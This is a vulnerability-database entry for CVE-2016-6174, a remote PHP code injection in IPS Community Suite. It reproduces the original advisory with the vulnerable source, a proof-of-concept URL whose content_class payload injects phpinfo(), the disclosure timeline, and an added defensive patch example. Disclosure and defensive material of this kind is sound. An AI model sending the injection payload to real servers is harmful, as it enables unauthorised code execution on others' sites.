CVE-2016-6174

high
Published 2016-07-12 · Modified 2026-05-06
CVSS v3
8.1
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS v4 NEW
—
not yet in upstream
VIR risk
9.1

Description

applications/core/modules/front/system/content.php in Invision Power Services IPS Community Suite (aka Invision Power Board, IPB, or Power Board) before 4.1.13, when used with PHP before 5.4.24 or 5.5.x before 5.5.8, allows remote attackers to execute arbitrary code via the content_class parameter.

Predictions

Exploit likelihood
88%
Patch ETA
—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-40084 · webapps · php · text · 2 KB
Egidio Romano · 2016-07-11

IPS Community Suite 4.1.12.3 - PHP Code Injection

Source: Exploit-DB (text exploit)
---------------------------------------------------------------------------
IPS Community Suite <= 4.1.12.3 Autoloaded PHP Code Injection Vulnerability
---------------------------------------------------------------------------


[-] Software Link:

https://invisionpower.com/


[-] Affected Versions:

Version 4.1.12.3 and prior versions.


[-] Vulnerability Description:

The vulnerable code is located in the /applications/core/modules/front/system/content.php script:

38.	$class = 'IPS\\' . implode( '\\', explode( '_', \IPS\Request::i()->content_class ) );
39.	
40.	if ( ! class_exists( $class ) or ! in_array( 'IPS\Content', class_parents( $class ) ) )
41.	{
42.	    \IPS\Output::i()->error( 'node_error', '2S226/2', 404, '' );
43.	}

User input passed through the "content_class" request parameter is not properly sanitized before being used in a call
to the "class_exists()" function at line 40. This could be exploited by unauthenticated attackers to inject and execute
arbitrary PHP code leveraging the autoloading function defined in the /applications/cms/Application.php script:

171.	if ( mb_substr( $class, 0, 14 ) === 'IPS\cms\Fields' and is_numeric( mb_substr( $class, 14, 1 ) ) )
172.	{
173.	    $databaseId = mb_substr( $class, 14 );
174.	    eval( "namespace IPS\\cms; class Fields{$databaseId} extends Fields { public static \$customDatabaseId [...]
175.	}

Successful exploitation of this vulnerability requires the application to be running on PHP before version 5.4.24 or 5.5.8.


[-] Proof of Concept:

http://[host]/[ips]/index.php?app=core&module=system&controller=content&do=find&content_class=cms\Fields1{}phpinfo();/*


[-] Solution:

Update to version 4.1.13 or later.


[-] Disclosure Timeline:

[04/07/2016] - Vendor notified
[05/07/2016] - Vulnerability fixed in version 4.1.13: https://invisionpower.com/release-notes/4113-r44/
[06/07/2016] - CVE number requested
[06/07/2016] - CVE number assigned
[07/07/2016] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2016-6174 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2016-11
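For the defending side, an added example (not code from the advisory, nor from IPS Community Suite) showing the two checks the description above implies: a strict allow-list on content_class before class_exists() can trigger the autoloader, and an autoloader-side check that requires the whole class-name suffix to be digits rather than only its first character. The function names are hypothetical.

```php
<?php
// Added example, not code from the advisory or from IPS Community Suite.
// resolveContentClass() and fieldsClassSource() are hypothetical names.

// Front-controller side: allow-list content_class before class_exists()
// can hand an attacker-shaped string to the autoloader.
function resolveContentClass(string $contentClass): ?string
{
    // Only identifier segments joined by '_', e.g. "forums_Topic". Braces,
    // parentheses, ';', '/' and backslashes are rejected outright.
    if (!preg_match('/\A[A-Za-z][A-Za-z0-9]*(?:_[A-Za-z][A-Za-z0-9]*)*\z/', $contentClass)) {
        return null;
    }
    $class = 'IPS\\' . implode('\\', explode('_', $contentClass));
    // class_exists() may still autoload, but only a vetted name reaches it now.
    if (!class_exists($class) || !in_array('IPS\Content', class_parents($class), true)) {
        return null;
    }
    return $class;
}

// Autoloader side, defence in depth: require the entire suffix to be digits
// (is_numeric() on one character is what let "1{}..." through) and interpolate
// an int so the generated class body cannot be altered by the caller.
function fieldsClassSource(string $class): ?string
{
    if (mb_substr($class, 0, 14) !== 'IPS\cms\Fields') {
        return null;
    }
    $suffix = mb_substr($class, 14);
    if ($suffix === '' || !ctype_digit($suffix)) {
        return null;
    }
    $databaseId = (int) $suffix;
    return "namespace IPS\\cms; class Fields{$databaseId} extends Fields "
         . "{ public static \$customDatabaseId = {$databaseId}; }";
}

// Constructed inputs: the advisory's payload shape is rejected, a plain id passes.
var_dump(fieldsClassSource('IPS\cms\Fields1{}phpinfo();/*'));  // NULL
var_dump(fieldsClassSource('IPS\cms\Fields1') !== null);       // bool(true)
var_dump(resolveContentClass('cms\Fields1{}phpinfo();/*'));    // NULL
var_dump(resolveContentClass('cms_Fields1') === null);         // bool(true) unless the class is loadable
```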

Application impact

Vendor              Product                Versions                 Fixed
invisioncommunity   invision_power_board   endIncluding 4.1.12.3
php                 php                    endIncluding 5.4.23
php                 php                    5.5.0
php                 php                    5.5.1
php                 php                    5.5.2
php                 php                    5.5.3
php                 php                    5.5.4
php                 php                    5.5.5
php                 php                    5.5.6
php                 php                    5.5.7
